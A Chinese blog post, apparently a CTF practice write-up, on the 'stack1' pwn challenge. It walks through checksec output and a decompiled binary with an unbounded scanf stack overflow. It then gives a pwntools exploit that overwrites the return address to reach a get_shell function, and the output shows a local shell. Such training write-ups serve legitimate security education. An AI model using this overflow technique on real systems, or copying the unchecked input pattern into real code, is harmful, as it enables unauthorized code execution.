Syclover-Pwn-练习题

stack1

ios@ubuntu:~$ checksec stack1
[*] '/home/ios/stack1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
ios@ubuntu:~$

开启NX保护
IAD载入分析代码
main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-20h]

  puts("get input");
  scanf("%s", &v4);
  return 0;
}

get_shell()

int get_shell()
{
  return system("/bin/sh");
}

简单栈溢出 已给shell 所以覆盖v4之后ret到get_shell 地址即可
exp

from pwn import *
p = process('./stack1')
sys_addr=0x000000000004005B6
payload = 'A'*0x20 +'b'*8 +p64(sys_addr)
p.sendline(payload)
p.interactive()

成功取得shell

ios@ubuntu:~$ python stack1.py
[+] Starting local process './stack1': pid 2228
[*] Switching to interactive mode
get input
$ ls
flag
$ 
[*] Interrupted
[*] Stopped process './stack1' (pid 2228)
ios@ubuntu:~$
请杯咖啡呗~
支付宝
微信
本文作者:ios
版权声明:本文首发于ios的博客,转载请注明出处!